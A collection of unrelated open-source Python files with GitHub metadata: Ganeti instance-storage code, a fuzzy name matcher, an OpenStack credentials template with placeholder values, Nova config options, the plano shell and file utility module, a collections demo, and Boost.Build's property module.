self.lu.LogInfo("Detaching primary drbds from the network (=> standalone)")
result = self.rpc.call_drbd_disconnect_net(
[pnode], (inst_disks, self.instance))[pnode]
msg = result.fail_msg
if msg:
# detaches didn't succeed (unlikely)
for disk in inst_disks:
self.cfg.ReleaseDRBDMinors(disk.uuid)
raise errors.OpExecError("Can't detach the disks from the network on"
" old node: %s" % (msg,))
# if we managed to detach at least one, we update all the disks of
# the instance to point to the new secondary
self._UpdateDisksSecondary(iv_names, feedback_fn)
# Release all node locks (the configuration has been updated)
ReleaseLocks(self.lu, locking.LEVEL_NODE)
# and now perform the drbd attach
self.lu.LogInfo("Attaching primary drbds to new secondary"
" (standalone => connected)")
inst_disks = self.cfg.GetInstanceDisks(self.instance.uuid)
result = self.rpc.call_drbd_attach_net([self.instance.primary_node,
self.new_node_uuid],
(inst_disks, self.instance),
False)
for to_node, to_result in result.items():
msg = to_result.fail_msg
if msg:
raise errors.OpExecError(
"Can't attach drbd disks on node %s: %s (please do a gnt-instance "
"info %s to see the status of disks)" %
(self.cfg.GetNodeName(to_node), msg, self.instance.name))
cstep = itertools.count(5)
if self.early_release:
self.lu.LogStep(cstep.next(), steps_total, "Removing old storage")
self._RemoveOldStorage(self.target_node_uuid, iv_names)
# TODO: Check if releasing locks early still makes sense
ReleaseLocks(self.lu, locking.LEVEL_NODE_RES)
else:
# Release all resource locks except those used by the instance
ReleaseLocks(self.lu, locking.LEVEL_NODE_RES,
keep=self.node_secondary_ip.keys())
# TODO: Can the instance lock be downgraded here? Take the optional disk
# shutdown in the caller into consideration.
# Wait for sync
# This can fail as the old devices are degraded and _WaitForSync
# does a combined result over all disks, so we don't check its return value
self.lu.LogStep(cstep.next(), steps_total, "Sync devices")
WaitForSync(self.lu, self.instance)
# Check all devices manually
self._CheckDevices(self.instance.primary_node, iv_names)
# Step: remove old storage
if not self.early_release:
self.lu.LogStep(cstep.next(), steps_total, "Removing old storage")
self._RemoveOldStorage(self.target_node_uuid, iv_names)
class TemporaryDisk(object):
""" Creates a new temporary bootable disk, and makes sure it is destroyed.
Is a context manager, and should be used with the ``with`` statement as such.
The disk is guaranteed to be created at index 0, shifting any other disks of
the instance by one place, and allowing the instance to be booted with the
content of the disk.
"""
def __init__(self, lu, instance, disks, feedback_fn,
shutdown_timeout=constants.DEFAULT_SHUTDOWN_TIMEOUT):
""" Constructor storing arguments until used later.
@type lu: L{ganeti.cmdlib.base.LogicalUnit}
@param lu: The LU within which this disk is created.
@type instance: L{ganeti.objects.Instance}
@param instance: The instance to which the disk should be added
@type disks: list of triples (disk template, disk access mode, int)
@param disks:
disk specification, which is a list of triples containing the
disk template (e.g., L{constants.DT_PLAIN}), the disk access
mode (i.e., L{constants.DISK_RDONLY} or L{constants.DISK_RDWR}),
and size in MiB.
@type feedback_fn: function
@param feedback_fn: Function used to log progress
"""
self._lu = lu
self._instance = instance
self._disks = disks
self._feedback_fn = feedback_fn
self._shutdown_timeout = shutdown_timeout
def _EnsureInstanceDiskState(self):
""" Ensures that the instance is down, and its disks inactive.
All the operations related to the creation and destruction of disks require
that the instance is down and that the disks are inactive. This function is
invoked to make it so.
"""
# The instance needs to be down before any of these actions occur
# Whether it is must be checked manually through a RPC - configuration
# reflects only the desired state
self._feedback_fn("Shutting down instance")
result = self._lu.rpc.call_instance_shutdown(self._instance.primary_node,
self._instance,
self._shutdown_timeout,
self._lu.op.reason)
result.Raise("Shutdown of instance '%s' while removing temporary disk "
"failed" % self._instance.name)
# Disks need to be deactivated prior to being removed
# The disks_active configuration entry should match the actual state
if self._instance.disks_active:
self._feedback_fn("Deactivating disks")
ShutdownInstanceDisks(self._lu, self._instance)
def __enter__(self):
""" Context manager entry function, creating the disk.
@rtype: L{ganeti.objects.Disk}
@return: The disk object created.
"""
self._EnsureInstanceDiskState()
new_disks = []
# The iv_name of the disk intentionally diverges from Ganeti's standards, as
# this disk should be very temporary and its presence should be reported.
# With the special iv_name, gnt-cluster verify detects the disk and warns
# the user of its presence. Removing the disk restores the instance to its
# proper state, despite an error that appears when the removal is performed.
for idx, (disk_template, disk_access, disk_size) in enumerate(self._disks):
new_disk = objects.Disk()
new_disk.dev_type = disk_template
new_disk.mode = disk_access
new_disk.uuid = self._lu.cfg.GenerateUniqueID(self._lu.proc.GetECId())
new_disk.logical_id = (self._lu.cfg.GetVGName(), new_disk.uuid)
new_disk.params = {}
new_disk.size = disk_size
new_disks.append(new_disk)
self._feedback_fn("Attempting to create temporary disk")
self._undoing_info = CreateDisks(self._lu, self._instance, disks=new_disks)
for idx, new_disk in enumerate(new_disks):
self._lu.cfg.AddInstanceDisk(self._instance.uuid, new_disk, idx=idx)
self._instance = self._lu.cfg.GetInstanceInfo(self._instance.uuid)
self._feedback_fn("Temporary disk created")
self._new_disks = new_disks
return new_disks
def __exit__(self, exc_type, _value, _traceback):
""" Context manager exit function, destroying the disk.
"""
if exc_type:
self._feedback_fn("Exception raised, cleaning up temporary disk")
else:
self._feedback_fn("Regular cleanup of temporary disk")
try:
self._EnsureInstanceDiskState()
_UndoCreateDisks(self._lu, self._undoing_info, self._instance)
for disk in self._new_disks:
self._lu.cfg.RemoveInstanceDisk(self._instance.uuid, disk.uuid)
self._instance = self._lu.cfg.GetInstanceInfo(self._instance.uuid)
self._feedback_fn("Temporary disk removed")
except:
self._feedback_fn("Disk cleanup failed; it will have to be removed "
"manually")
raise
|
{
"content_hash": "85072568709285863dae4a52c5137199",
"timestamp": "",
"source": "github",
"line_count": 3112,
"max_line_length": 80,
"avg_line_length": 38.926735218508995,
"alnum_prop": 0.6302459963678388,
"repo_name": "onponomarev/ganeti",
"id": "3abc5f8ee0e54e8cb9b38e54fc24d0f404f70e9d",
"size": "122530",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "lib/cmdlib/instance_storage.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Haskell",
"bytes": "2639381"
},
{
"name": "Python",
"bytes": "5967379"
},
{
"name": "Shell",
"bytes": "118007"
}
],
"symlink_target": ""
}
|
from fuzzywuzzy import process
import codecs#, re, sys
from residents import RESIDENTS, NAMES
filename = raw_input('Enter a name for the new file: ')
file = codecs.open(filename, 'w', encoding='utf-8', errors='ignore')
for resident in RESIDENTS:
match = process.extractOne(resident, NAMES)
name, accuracy = match[0], match[1]
# if accuracy < 60:
# print resident
# name = raw_input("Enter Resident Name: ")
s = "'%s': '%s', %s\n" % (resident, name, accuracy)
file.write(unicode(s))
file.close()
|
{
"content_hash": "878d8a7a54d448b2bfd65ad1459d5b0f",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 68,
"avg_line_length": 34,
"alnum_prop": 0.6843137254901961,
"repo_name": "swiharta/radres",
"id": "9a18fa0b2044ba6be3c2f30eeb4b35f1e86a258d",
"size": "510",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "match.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "ActionScript",
"bytes": "69146"
},
{
"name": "C#",
"bytes": "3961"
},
{
"name": "CSS",
"bytes": "810888"
},
{
"name": "CoffeeScript",
"bytes": "36376"
},
{
"name": "ColdFusion",
"bytes": "3203"
},
{
"name": "Java",
"bytes": "42001"
},
{
"name": "JavaScript",
"bytes": "1372325"
},
{
"name": "PHP",
"bytes": "19400"
},
{
"name": "Perl",
"bytes": "468"
},
{
"name": "Python",
"bytes": "195378"
},
{
"name": "Ruby",
"bytes": "672"
},
{
"name": "Shell",
"bytes": "110"
},
{
"name": "Visual Basic",
"bytes": "2769"
}
],
"symlink_target": ""
}
|
import os
# With the addition of Keystone, to use an openstack cloud you should
# authenticate against keystone, which returns a **Token** and **Service
# Catalog**. The catalog contains the endpoint for all services the
# user/tenant has access to - including nova, glance, keystone, swift.
#
# *NOTE*: Using the 2.0 *auth api* does not mean that compute api is 2.0. We
# will use the 1.1 *compute api*
os.environ['OS_AUTH_URL'] = "https://keystone.rc.nectar.org.au:5000/v2.0/"
# With the addition of Keystone we have standardized on the term **tenant**
# as the entity that owns the resources.
os.environ['OS_TENANT_ID'] = "123456789012345678901234567890"
os.environ['OS_TENANT_NAME'] = "tenant_name"
# In addition to the owning entity (tenant), openstack stores the entity
# performing the action as the **user**.
os.environ['OS_USERNAME'] = "joe.bloggs@uni.edu.au"
# With Keystone you pass the keystone password.
os.environ['OS_PASSWORD'] = "????????????????????"
|
{
"content_hash": "10ddac7e8c5e27e4b904498a42330c6a",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 77,
"avg_line_length": 42.391304347826086,
"alnum_prop": 0.7138461538461538,
"repo_name": "wettenhj/mytardis-swift-uploader",
"id": "8918554632890de54b14794e5fac542aaf4ce0e6",
"size": "994",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "openrc.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "30706"
}
],
"symlink_target": ""
}
|
import os
import socket
from nova.openstack.common import cfg
from nova.openstack.common import rpc
def _get_my_ip():
"""
Returns the actual ip of the local machine.
This code figures out what source address would be used if some traffic
were to be sent out to some well known address on the Internet. In this
case, a Google DNS server is used, but the specific address does not
matter much. No traffic is actually sent.
"""
try:
csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
csock.connect(('8.8.8.8', 80))
(addr, port) = csock.getsockname()
csock.close()
return addr
except socket.error:
return "127.0.0.1"
global_opts = [
cfg.StrOpt('my_ip',
default=_get_my_ip(),
help='ip address of this host'),
cfg.ListOpt('enabled_apis',
default=['ec2', 'osapi_compute', 'metadata'],
help='a list of APIs to enable by default'),
cfg.StrOpt('vpn_image_id',
default='0',
help='image id used when starting up a cloudpipe vpn server'),
cfg.StrOpt('vpn_key_suffix',
default='-vpn',
help='Suffix to add to project name for vpn key and secgroups'),
cfg.StrOpt('host',
default=socket.getfqdn(),
help='Name of this node. This can be an opaque identifier. '
'It is not necessarily a hostname, FQDN, or IP address. '
'However, the node name must be valid within '
'an AMQP key, and if using ZeroMQ, a valid '
'hostname, FQDN, or IP address'),
cfg.ListOpt('memcached_servers',
default=None,
help='Memcached servers or None for in process cache.'),
cfg.BoolOpt('use_ipv6',
default=False,
help='use ipv6'),
cfg.IntOpt('service_down_time',
default=60,
help='maximum time since last check-in for up service'),
]
cfg.CONF.register_opts(global_opts)
def parse_args(argv, default_config_files=None):
rpc.set_defaults(control_exchange='nova')
cfg.CONF(argv[1:],
project='nova',
default_config_files=default_config_files)
|
{
"content_hash": "dc54600112da82b53ef6e1715b327090",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 79,
"avg_line_length": 35.215384615384615,
"alnum_prop": 0.581476627348187,
"repo_name": "fajoy/nova",
"id": "172e772ae5a6a47d9708e588ef835ff1d2d0829b",
"size": "3097",
"binary": false,
"copies": "1",
"ref": "refs/heads/grizzly-2",
"path": "nova/config.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "16002"
},
{
"name": "JavaScript",
"bytes": "7403"
},
{
"name": "Python",
"bytes": "7567423"
},
{
"name": "Shell",
"bytes": "15428"
}
],
"symlink_target": ""
}
|
from __future__ import print_function
import atexit as _atexit
import codecs as _codecs
import fnmatch as _fnmatch
import getpass as _getpass
import os as _os
import random as _random
import re as _re
import shutil as _shutil
import subprocess as _subprocess
import sys as _sys
import tarfile as _tarfile
import tempfile as _tempfile
import traceback as _traceback
# See documentation at http://www.ssorj.net/projects/plano.html
def fail(message, *args):
error(message, *args)
if isinstance(message, BaseException):
raise message
raise Exception(message)
def error(message, *args):
_print_message("Error", message, args, _sys.stderr)
def warn(message, *args):
_print_message("Warn", message, args, _sys.stderr)
def notice(message, *args):
_print_message(None, message, args, _sys.stdout)
def debug(message, *args):
_print_message("Debug", message, args, _sys.stdout)
def exit(message=None, *args):
if message is None:
_sys.exit()
_print_message("Error", message, args, _sys.stderr)
_sys.exit(1)
def _print_message(category, message, args, file):
message = _format_message(category, message, args)
print(message, file=file)
file.flush()
def _format_message(category, message, args):
if isinstance(message, BaseException):
message = str(message)
if message == "":
message = message.__class__.__name__
if category:
message = "{0}: {1}".format(category, message)
if args:
message = message.format(*args)
script = split(_sys.argv[0])[1]
message = "{0}: {1}".format(script, message)
return message
def flush():
_sys.stdout.flush()
_sys.stderr.flush()
absolute_path = _os.path.abspath
normalize_path = _os.path.normpath
exists = _os.path.exists
is_absolute = _os.path.isabs
is_dir = _os.path.isdir
is_file = _os.path.isfile
is_link = _os.path.islink
join = _os.path.join
split = _os.path.split
split_extension = _os.path.splitext
LINE_SEP = _os.linesep
PATH_SEP = _os.sep
PATH_VAR_SEP = _os.pathsep
ENV = _os.environ
ARGS = _sys.argv
current_dir = _os.getcwd
def home_dir(user=""):
return _os.path.expanduser("~{0}".format(user))
def parent_dir(path):
path = normalize_path(path)
parent, child = split(path)
return parent
def file_name(file):
file = normalize_path(file)
dir, name = split(file)
return name
def name_stem(file):
name = file_name(file)
if name.endswith(".tar.gz"):
name = name[:-3]
stem, ext = split_extension(name)
return stem
def name_extension(file):
name = file_name(file)
stem, ext = split_extension(name)
return ext
def read(file):
with _codecs.open(file, encoding="utf-8", mode="r") as f:
return f.read()
def write(file, string):
with _codecs.open(file, encoding="utf-8", mode="w") as f:
f.write(string)
return file
def append(file, string):
with _codecs.open(file, encoding="utf-8", mode="a") as f:
f.write(string)
return file
def prepend(file, string):
orig = read(file)
prepended = string + orig
return write(file, prepended)
def touch(file):
return append(file, "")
def tail(file, n):
return "".join(tail_lines(file, n))
def read_lines(file):
with _codecs.open(file, encoding="utf-8", mode="r") as f:
return f.readlines()
def write_lines(file, lines):
with _codecs.open(file, encoding="utf-8", mode="r") as f:
f.writelines(lines)
return file
def append_lines(file, lines):
with _codecs.open(file, encoding="utf-8", mode="a") as f:
f.writelines(string)
return file
def prepend_lines(file, lines):
orig_lines = read_lines(file)
with _codecs.open(file, encoding="utf-8", mode="w") as f:
f.writelines(lines)
f.writelines(orig_lines)
return file
# Derived from http://stackoverflow.com/questions/136168/get-last-n-lines-of-a-file-with-python-similar-to-tail
def tail_lines(file, n):
assert n >= 0
with _codecs.open(file, encoding="utf-8", mode="r") as f:
pos = n + 1
lines = list()
while len(lines) <= n:
try:
f.seek(-pos, 2)
except IOError:
f.seek(0)
break
finally:
lines = f.readlines()
pos *= 2
return lines[-n:]
_temp_dir = _tempfile.mkdtemp(prefix="plano.")
def _get_temp_file(key):
assert not key.startswith("_")
return join(_temp_dir, "_file_{0}".format(key))
def _remove_temp_dir():
_shutil.rmtree(_temp_dir, ignore_errors=True)
_atexit.register(_remove_temp_dir)
def read_temp(key):
file = _get_temp_file(key)
return read(file)
def write_temp(key, string):
file = _get_temp_file(key)
return write(file, string)
def append_temp(key, string):
file = _get_temp_file(key)
return append(file, string)
def prepend_temp(key, string):
file = _get_temp_file(key)
return prepend(file, string)
def make_temp(key):
return append_temp(key, "")
def open_temp(key, mode="r"):
file = _get_temp_file(key)
return _codecs.open(file, encoding="utf-8", mode=mode)
# This one is deleted on process exit
def make_temp_dir():
return _tempfile.mkdtemp(prefix="_dir_", dir=_temp_dir)
# This one sticks around
def make_user_temp_dir():
temp_dir = _tempfile.gettempdir()
user = _getpass.getuser()
user_temp_dir = join(temp_dir, user)
return make_dir(user_temp_dir)
def copy(from_path, to_path):
notice("Copying '{0}' to '{1}'", from_path, to_path)
to_dir = parent_dir(to_path)
if to_dir:
make_dir(to_dir)
if is_dir(from_path):
_copytree(from_path, to_path, symlinks=True)
else:
_shutil.copy(from_path, to_path)
return to_path
def move(from_path, to_path):
notice("Moving '{0}' to '{1}'", from_path, to_path)
_shutil.move(from_path, to_path)
return to_path
def rename(path, expr, replacement):
path = normalize_path(path)
parent_dir, name = split(path)
to_name = string_replace(name, expr, replacement)
to_path = join(parent_dir, to_name)
notice("Renaming '{0}' to '{1}'", path, to_path)
move(path, to_path)
return to_path
def remove(path):
notice("Removing '{0}'", path)
if not exists(path):
return
if is_dir(path):
_shutil.rmtree(path, ignore_errors=True)
else:
_os.remove(path)
return path
def make_link(source_path, link_file):
if exists(link_file):
assert read_link(link_file) == source_path
return
_os.symlink(source_path, link_file)
return link_file
def read_link(file):
return _os.readlink(file)
def find(dir, *patterns):
matched_paths = set()
if not patterns:
patterns = ("*",)
for root, dirs, files in _os.walk(dir):
for pattern in patterns:
matched_dirs = _fnmatch.filter(dirs, pattern)
matched_files = _fnmatch.filter(files, pattern)
matched_paths.update([join(root, x) for x in matched_dirs])
matched_paths.update([join(root, x) for x in matched_files])
return sorted(matched_paths)
def find_any_one(dir, *patterns):
paths = find(dir, *patterns)
if len(paths) == 0:
return
return paths[0]
def find_only_one(dir, *patterns):
paths = find(dir, *patterns)
if len(paths) == 0:
return
assert len(paths) == 1
return paths[0]
# find_via_expr?
def string_replace(string, expr, replacement, count=0):
return _re.sub(expr, replacement, string, count)
def make_dir(dir):
if not exists(dir):
_os.makedirs(dir)
return dir
# Returns the current working directory so you can change it back
def change_dir(dir):
notice("Changing directory to '{0}'", dir)
cwd = current_dir()
_os.chdir(dir)
return cwd
def list_dir(dir, *patterns):
assert is_dir(dir)
names = _os.listdir(dir)
if not patterns:
return sorted(names)
matched_names = set()
for pattern in patterns:
matched_names.update(_fnmatch.filter(names, pattern))
return sorted(matched_names)
class working_dir(object):
def __init__(self, dir):
self.dir = dir
self.prev_dir = None
def __enter__(self):
self.prev_dir = change_dir(self.dir)
return self.dir
def __exit__(self, type, value, traceback):
change_dir(self.prev_dir)
def _init_call(command, args, kwargs):
if args:
command = command.format(*args)
if "shell" not in kwargs:
kwargs["shell"] = True
notice("Calling '{0}'", command)
return command, kwargs
def call(command, *args, **kwargs):
command, kwargs = _init_call(command, args, kwargs)
_subprocess.check_call(command, **kwargs)
def call_for_output(command, *args, **kwargs):
command, kwargs = _init_call(command, args, kwargs)
return _subprocess_check_output(command, **kwargs)
def make_archive(input_dir, output_dir, archive_stem):
temp_dir = make_temp_dir()
temp_input_dir = join(temp_dir, archive_stem)
copy(input_dir, temp_input_dir)
make_dir(output_dir)
output_file = "{0}.tar.gz".format(join(output_dir, archive_stem))
output_file = absolute_path(output_file)
with working_dir(temp_dir):
call("tar -czf {0} {1}", output_file, archive_stem)
return output_file
def extract_archive(archive_file, output_dir):
assert is_file(archive_file)
if not exists(output_dir):
make_dir(output_dir)
archive_file = absolute_path(archive_file)
with working_dir(output_dir):
call("tar -xf {0}", archive_file)
return output_dir
def rename_archive(archive_file, new_archive_stem):
assert is_file(archive_file)
if name_stem(archive_file) == new_archive_stem:
return
temp_dir = make_temp_dir()
extract_archive(archive_file, temp_dir)
input_name = list_dir(temp_dir)[0]
input_dir = join(temp_dir, input_name)
output_file = make_archive(input_dir, temp_dir, new_archive_stem)
output_name = file_name(output_file)
archive_dir = parent_dir(archive_file)
new_archive_file = join(archive_dir, output_name)
move(output_file, new_archive_file)
remove(archive_file)
return new_archive_file
def random_port(min=49152, max=65535):
return _random.randint(min, max)
# Modified copytree impl that allows for already existing destination
# dirs
def _copytree(src, dst, symlinks=False, ignore=None):
"""Recursively copy a directory tree using copy2().
If exception(s) occur, an Error is raised with a list of reasons.
If the optional symlinks flag is true, symbolic links in the
source tree result in symbolic links in the destination tree; if
it is false, the contents of the files pointed to by symbolic
links are copied.
The optional ignore argument is a callable. If given, it
is called with the `src` parameter, which is the directory
being visited by copytree(), and `names` which is the list of
`src` contents, as returned by os.listdir():
callable(src, names) -> ignored_names
Since copytree() is called recursively, the callable will be
called once for each directory that is copied. It returns a
list of names relative to the `src` directory that should
not be copied.
XXX Consider this example code rather than the ultimate tool.
"""
names = _os.listdir(src)
if ignore is not None:
ignored_names = ignore(src, names)
else:
ignored_names = set()
if not exists(dst):
_os.makedirs(dst)
errors = []
for name in names:
if name in ignored_names:
continue
srcname = _os.path.join(src, name)
dstname = _os.path.join(dst, name)
try:
if symlinks and _os.path.islink(srcname):
linkto = _os.readlink(srcname)
_os.symlink(linkto, dstname)
elif _os.path.isdir(srcname):
_copytree(srcname, dstname, symlinks, ignore)
else:
# Will raise a SpecialFileError for unsupported file types
_shutil.copy2(srcname, dstname)
# catch the Error from the recursive copytree so that we can
# continue with other files
except _shutil.Error as err:
errors.extend(err.args[0])
except EnvironmentError as why:
errors.append((srcname, dstname, str(why)))
try:
_shutil.copystat(src, dst)
except OSError as why:
if _shutil.WindowsError is not None and isinstance \
(why, _shutil.WindowsError):
# Copying file access times may fail on Windows
pass
else:
errors.append((src, dst, str(why)))
if errors:
raise _shutil.Error(errors)
# For Python 2.6 compatibility
def _subprocess_check_output(command, **kwargs):
kwargs["stdout"] = _subprocess.PIPE
proc = _subprocess.Popen(command, **kwargs)
output = proc.communicate()[0]
exit_code = proc.poll()
if exit_code not in (None, 0):
error = _subprocess.CalledProcessError(exit_code, command)
error.output = output
raise error
return output
|
{
"content_hash": "aa02a6833343d338f0c54195b297f251",
"timestamp": "",
"source": "github",
"line_count": 540,
"max_line_length": 111,
"avg_line_length": 24.612962962962964,
"alnum_prop": 0.6308027988864645,
"repo_name": "irinabov/debian-qpid-cpp-1.35.0",
"id": "e76fba03eb432025c6bb15680ffd33b66a1e91d3",
"size": "14083",
"binary": false,
"copies": "3",
"ref": "refs/heads/trusty",
"path": "src/tests/plano.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
}
|
'collectons module study'
__author__ = 'XieYu'
from collections import namedtuple
Point = namedtuple('Point', ['x', 'y'])
p = Point(1, 2)
print(p.x, p.y)
from collections import deque
q = deque(['a', 'b', 'c'])
q.append('x')
q.appendleft('y')
print(q)
|
{
"content_hash": "145ef0e22973cc9ecb9435191266f5af",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 39,
"avg_line_length": 17,
"alnum_prop": 0.6392156862745098,
"repo_name": "xieyufish/note",
"id": "d8ff3456ecc284e008c7a700ecf65377778498d2",
"size": "303",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "语言/python/code/study/collections.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "696858"
},
{
"name": "HTML",
"bytes": "14260"
},
{
"name": "Java",
"bytes": "83898"
},
{
"name": "JavaScript",
"bytes": "621101"
},
{
"name": "Python",
"bytes": "70835"
}
],
"symlink_target": ""
}
|
import re
import sys
from b2.util.utility import *
from b2.build import feature
from b2.util import sequence, qualify_jam_action, is_iterable_typed
import b2.util.set
from b2.manager import get_manager
__re_two_ampersands = re.compile ('&&')
__re_comma = re.compile (',')
__re_split_condition = re.compile ('(.*):(<.*)')
__re_split_conditional = re.compile (r'(.+):<(.+)')
__re_colon = re.compile (':')
__re_has_condition = re.compile (r':<')
__re_separate_condition_and_property = re.compile (r'(.*):(<.*)')
__not_applicable_feature='not-applicable-in-this-context'
feature.feature(__not_applicable_feature, [], ['free'])
__abbreviated_paths = False
class Property(object):
__slots__ = ('_feature', '_value', '_condition')
def __init__(self, f, value, condition = []):
if type(f) == type(""):
f = feature.get(f)
# At present, single property has a single value.
assert type(value) != type([])
assert(f.free() or value.find(':') == -1)
self._feature = f
self._value = value
self._condition = condition
def feature(self):
return self._feature
def value(self):
return self._value
def condition(self):
return self._condition
def to_raw(self):
result = "<" + self._feature.name() + ">" + str(self._value)
if self._condition:
result = ",".join(str(p) for p in self._condition) + ':' + result
return result
def __str__(self):
return self.to_raw()
def __hash__(self):
# FIXME: consider if this class should be value-is-identity one
return hash((self._feature, self._value, tuple(self._condition)))
def __cmp__(self, other):
return cmp((self._feature.name(), self._value, self._condition),
(other._feature.name(), other._value, other._condition))
def create_from_string(s, allow_condition=False,allow_missing_value=False):
assert isinstance(s, basestring)
assert isinstance(allow_condition, bool)
assert isinstance(allow_missing_value, bool)
condition = []
import types
if not isinstance(s, types.StringType):
print type(s)
if __re_has_condition.search(s):
if not allow_condition:
raise BaseException("Conditional property is not allowed in this context")
m = __re_separate_condition_and_property.match(s)
condition = m.group(1)
s = m.group(2)
# FIXME: break dependency cycle
from b2.manager import get_manager
feature_name = get_grist(s)
if not feature_name:
if feature.is_implicit_value(s):
f = feature.implied_feature(s)
value = s
else:
raise get_manager().errors()("Invalid property '%s' -- unknown feature" % s)
else:
if feature.valid(feature_name):
f = feature.get(feature_name)
value = get_value(s)
else:
# In case feature name is not known, it is wrong to do a hard error.
# Feature sets change depending on the toolset. So e.g.
# <toolset-X:version> is an unknown feature when using toolset Y.
#
# Ideally we would like to ignore this value, but most of
# Boost.Build code expects that we return a valid Property. For this
# reason we use a sentinel <not-applicable-in-this-context> feature.
#
# The underlying cause for this problem is that python port Property
# is more strict than its Jam counterpart and must always reference
# a valid feature.
f = feature.get(__not_applicable_feature)
value = s
if not value and not allow_missing_value:
get_manager().errors()("Invalid property '%s' -- no value specified" % s)
if condition:
condition = [create_from_string(x) for x in condition.split(',')]
return Property(f, value, condition)
def create_from_strings(string_list, allow_condition=False):
assert is_iterable_typed(string_list, basestring)
return [create_from_string(s, allow_condition) for s in string_list]
def reset ():
""" Clear the module state. This is mainly for testing purposes.
"""
global __results
# A cache of results from as_path
__results = {}
reset ()
def set_abbreviated_paths(on=True):
global __abbreviated_paths
__abbreviated_paths = on
def get_abbreviated_paths():
return __abbreviated_paths or '--abbreviated-paths' in sys.argv
def path_order (x, y):
""" Helper for as_path, below. Orders properties with the implicit ones
first, and within the two sections in alphabetical order of feature
name.
"""
if x == y:
return 0
xg = get_grist (x)
yg = get_grist (y)
if yg and not xg:
return -1
elif xg and not yg:
return 1
else:
if not xg:
x = feature.expand_subfeatures([x])
y = feature.expand_subfeatures([y])
if x < y:
return -1
elif x > y:
return 1
else:
return 0
def identify(string):
return string
# Uses Property
def refine (properties, requirements):
""" Refines 'properties' by overriding any non-free properties
for which a different value is specified in 'requirements'.
Conditional requirements are just added without modification.
Returns the resulting list of properties.
"""
assert is_iterable_typed(properties, Property)
assert is_iterable_typed(requirements, Property)
# The result has no duplicates, so we store it in a set
result = set()
# Records all requirements.
required = {}
# All the elements of requirements should be present in the result
# Record them so that we can handle 'properties'.
for r in requirements:
# Don't consider conditional requirements.
if not r.condition():
required[r.feature()] = r
for p in properties:
# Skip conditional properties
if p.condition():
result.add(p)
# No processing for free properties
elif p.feature().free():
result.add(p)
else:
if required.has_key(p.feature()):
result.add(required[p.feature()])
else:
result.add(p)
return sequence.unique(list(result) + requirements)
def translate_paths (properties, path):
""" Interpret all path properties in 'properties' as relative to 'path'
The property values are assumed to be in system-specific form, and
will be translated into normalized form.
"""
result = []
for p in properties:
if p.feature().path():
values = __re_two_ampersands.split(p.value())
new_value = "&&".join(os.path.join(path, v) for v in values)
if new_value != p.value():
result.append(Property(p.feature(), new_value, p.condition()))
else:
result.append(p)
else:
result.append (p)
return result
def translate_indirect(properties, context_module):
"""Assumes that all feature values that start with '@' are
names of rules, used in 'context-module'. Such rules can be
either local to the module or global. Qualified local rules
with the name of the module."""
assert is_iterable_typed(properties, Property)
assert isinstance(context_module, basestring)
result = []
for p in properties:
if p.value()[0] == '@':
q = qualify_jam_action(p.value()[1:], context_module)
get_manager().engine().register_bjam_action(q)
result.append(Property(p.feature(), '@' + q, p.condition()))
else:
result.append(p)
return result
def validate (properties):
""" Exit with error if any of the properties is not valid.
properties may be a single property or a sequence of properties.
"""
if isinstance(properties, Property):
properties = [properties]
assert is_iterable_typed(properties, Property)
for p in properties:
__validate1(p)
def expand_subfeatures_in_conditions (properties):
assert is_iterable_typed(properties, Property)
result = []
for p in properties:
if not p.condition():
result.append(p)
else:
expanded = []
for c in p.condition():
if c.feature().name().startswith("toolset") or c.feature().name() == "os":
# It common that condition includes a toolset which
# was never defined, or mentiones subfeatures which
# were never defined. In that case, validation will
# only produce an spirious error, so don't validate.
expanded.extend(feature.expand_subfeatures ([c], True))
else:
expanded.extend(feature.expand_subfeatures([c]))
result.append(Property(p.feature(), p.value(), expanded))
return result
# FIXME: this should go
def split_conditional (property):
""" If 'property' is conditional property, returns
condition and the property, e.g
<variant>debug,<toolset>gcc:<inlining>full will become
<variant>debug,<toolset>gcc <inlining>full.
Otherwise, returns empty string.
"""
assert isinstance(property, basestring)
m = __re_split_conditional.match (property)
if m:
return (m.group (1), '<' + m.group (2))
return None
def select (features, properties):
""" Selects properties which correspond to any of the given features.
"""
assert is_iterable_typed(properties, basestring)
result = []
# add any missing angle brackets
features = add_grist (features)
return [p for p in properties if get_grist(p) in features]
def validate_property_sets (sets):
if __debug__:
from .property_set import PropertySet
assert is_iterable_typed(sets, PropertySet)
for s in sets:
validate(s.all())
def evaluate_conditionals_in_context (properties, context):
""" Removes all conditional properties which conditions are not met
For those with met conditions, removes the condition. Properies
in conditions are looked up in 'context'
"""
if __debug__:
from .property_set import PropertySet
assert is_iterable_typed(properties, Property)
assert isinstance(context, PropertySet)
base = []
conditional = []
for p in properties:
if p.condition():
conditional.append (p)
else:
base.append (p)
result = base[:]
for p in conditional:
# Evaluate condition
# FIXME: probably inefficient
if all(x in context for x in p.condition()):
result.append(Property(p.feature(), p.value()))
return result
def change (properties, feature, value = None):
""" Returns a modified version of properties with all values of the
given feature replaced by the given value.
If 'value' is None the feature will be removed.
"""
assert is_iterable_typed(properties, basestring)
assert isinstance(feature, basestring)
assert isinstance(value, (basestring, type(None)))
result = []
feature = add_grist (feature)
for p in properties:
if get_grist (p) == feature:
if value:
result.append (replace_grist (value, feature))
else:
result.append (p)
return result
################################################################
# Private functions
def __validate1 (property):
""" Exit with error if property is not valid.
"""
assert isinstance(property, Property)
msg = None
if not property.feature().free():
feature.validate_value_string (property.feature(), property.value())
###################################################################
# Still to port.
# Original lines are prefixed with "# "
#
#
# import utility : ungrist ;
# import sequence : unique ;
# import errors : error ;
# import feature ;
# import regex ;
# import sequence ;
# import set ;
# import path ;
